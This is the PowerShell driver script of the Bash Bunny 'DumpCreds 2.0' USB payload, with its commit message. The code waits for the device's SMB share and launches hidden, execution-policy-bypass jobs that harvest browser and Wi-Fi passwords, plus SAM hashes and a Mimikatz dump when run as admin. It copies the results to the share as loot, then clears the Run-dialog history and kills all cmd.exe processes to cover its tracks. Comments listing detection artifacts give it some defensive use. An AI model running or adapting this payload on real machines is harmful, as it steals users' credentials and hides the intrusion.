bashbunny-payloads/payloads/library/DumpCreds_2.0/main.ps1
Baur 18e71d2882 Added DumpCreds 2.0 payload (#138)
* Add files via upload

Init of DumpCreds 2.0

Dumps the usernames & plaintext passwords from 
 - Browsers (Crome, IE, FireFox)
 - Wifi 
 - SAM Hashes
 - Mimimk@tz Dump
 - Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist)
 
 without 
 - Use of USB Storage (because USB storage is mostly blocked by USBGuard or DriveLock)
 - Internet connection (because the firewall content filter blocks the download sites)

* Minor Fix

* Somf file to much

* Changes in main.ps1 - paralellize the Powershell scripts

Changes in payload.txt - Universal payload no matter if admin rights or not

Some minor changes in all PS\*.ps1 files

Signed-off-by: qdba <dieter@baur.nu>

* Forget a File

* WifiCreds changed

* Changes in README.md

* Changed Get Chrome-Cred.ps1 from https://github.com/EmpireProject/Empire/tree/master/data/module_source/collection

Changed BUILD in main.ps1
Changed Build and Credits in README.md
2017-04-07 15:13:12 +10:00


<#
.SYNOPSIS
DumpCred 2.0 - host-side driver script of the Bash Bunny DumpCreds payload.
.DESCRIPTION
Waits for the Bunny's SMB share, performs a file-based handshake on it, runs the
helper scripts under $SHARE\PS (not part of this file) as background jobs, and
writes their combined output to one file per host on the share.
Artifacts this script leaves on the host and on the wire (useful for detection
and incident response, all visible in the code below):
 - SMB connections to 172.16.64.1 and the marker files CON_REQ / CON_OK / CON_EOF on the share
 - a temporary file in the user's TEMP directory that holds the collected output
   until the final Move-Item succeeds (a failed move is silently ignored, so the
   file can be left behind)
 - child powershell.exe processes started with "-WindowStyle Hidden -Exec Bypass"
   and a UNC script path as argument
 - removal of every value under HKCU\...\Explorer\RunMRU and termination of all cmd.exe processes
.PARAMETER <paramName>
none
.EXAMPLE
DumpCred
#>
# Version/build stamp written to the first line of the output file.
# PowerShell variable names are case-insensitive, so $_Version here and
# $_VERSION further down refer to the same variable.
$_Version = "2.0.2"
$_BUILD = "1003"
# Share on bashbunny - the SMB share the Bunny exposes; every file operation
# below goes to this UNC path.
$SHARE="\\172.16.64.1\e"
$LOOT="$SHARE\loot"
# Output file on the share, named after the victim host.
$FILE="$LOOT\$env:COMPUTERNAME.txt"
# Local scratch file (GetTempFileName creates it in the user's TEMP dir).
$TMPFILE=[System.IO.Path]::GetTempFileName()
# True when the current token is in the local Administrators role; decides
# whether the hash/credential-memory jobs are started further down.
$isAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
$LINE3="`n`n`n"
# Wait for Share - polls once per second until the share answers.
# NOTE: the until-condition uses the literal UNC path rather than $SHARE,
# so the two have to be kept in sync by hand.
do {
Start-Sleep -s 1
Write-Host -NoNewline "-"
} until (test-path \\172.16.64.1\e)
# Share reachable - run the file-based handshake.
# The script creates CON_REQ on the share; the Bunny is expected to answer by
# creating CON_OK. Writing CON_REQ also proves the share is writable.
# This loop never times out: it spins until CON_OK appears.
while ( -Not (Test-Path "$SHARE\CON_OK")) {
Start-Sleep -s 1
Write-Host -NoNewline "."
if ( -Not (( Test-Path "$SHARE\CON_REQ") -or (Test-Path "$SHARE\CON_OK"))) {
Write-output " " | out-file "$SHARE\CON_REQ"
Write-Host -NoNewline "+"
}
}
Write-Host "!"
# Go on......
# Output is collected in a local TMP file because Out-File -Append to a file on
# the share did not work for the author; the file is moved to the share at the end.
# Remove the empty file GetTempFileName created; it is recreated by Out-File below.
Remove-Item $TMPFILE -ErrorAction SilentlyContinue
# Set Output buffer width to 500
# Widen the console buffer so long output lines are not wrapped/clipped when
# the job output is captured (only when a RawUI is available).
if( $Host -and $Host.UI -and $Host.UI.RawUI ) {
$rawUI = $Host.UI.RawUI
$oldSize = $rawUI.BufferSize
$typeName = $oldSize.GetType( ).FullName
$newSize = New-Object $typeName (500, $oldSize.Height)
$rawUI.BufferSize = $newSize
}
# Header of the output file: version, build and whether admin mode was active.
"###DumpCreds " + $_VERSION + " Build " + $_BUILD + " Admin Mode: " + $isAdmin| OUT-File $TMPFILE
"=======================================================" | OUT-File -append $TMPFILE
$LINE3 | Add-Content $TMPFILE
# Start all Scripts in $SHARE\PS as job
# First stop and remove *every* job in this PowerShell session, not only ones
# started by this script, so that Get-Job below only sees the jobs started here.
Stop-Job *
Remove-Job *
# Start all Jobs as background jobs.
# Each job spawns a separate powershell.exe with "-WindowStyle Hidden -Exec Bypass"
# and the helper script's UNC path as argument; the helper scripts themselves are
# not part of this file. The Write-Host calls only print a progress label.
Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} | Out-Null
Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} | Out-Null
Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} | Out-Null
# -RunAs32: this job runs in a 32-bit PowerShell process.
Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} | Out-Null
Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} | Out-Null
# The two jobs below are only started when the script runs elevated.
if ($isAdmin) {
Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} | Out-Null
Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-M1m1k@tz.ps1} | Out-Null
}
# Wait for all jobs (no timeout: a hung helper script blocks the whole run).
Get-Job | Wait-Job | Out-Null
# Receive all results - the jobs' output streams are appended to the TMP file.
Get-Job | Receive-Job | Out-File -Append $TMPFILE
# Move TMP File to Bunny. -Force overwrites an existing file for this host.
# Because errors are silenced, a failed move (share gone, loot dir missing)
# leaves the TMP file with the collected output in the user's TEMP directory.
move-item $TMPFILE -Destination $FILE -Force -ErrorAction SilentlyContinue
# Cleanup
# Remove Run History - deletes every value under the Explorer RunMRU key
# (the Run-dialog history); presumably because the payload is launched via the
# Run dialog - the launcher (payload.txt) is not shown here. Clearing this key
# is itself an observable anti-forensic action.
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
# Rename CON_OK to CON_EOF so bunny knows that all the stuff has finished.
# -NewName is given as a full path; this works because it points into the same
# directory as -Path. Unlike the other share operations this one is not
# error-silenced, so a missing CON_OK surfaces as an error here.
Rename-Item -Path "$SHARE\CON_OK" -NewName "$SHARE\CON_EOF"
# Kill cmd.exe - terminates *every* cmd.exe the user can stop, not just the
# one that launched this script.
Stop-Process -name cmd -ErrorAction SilentlyContinue
# Remove all Jobs from Joblist
Remove-Job *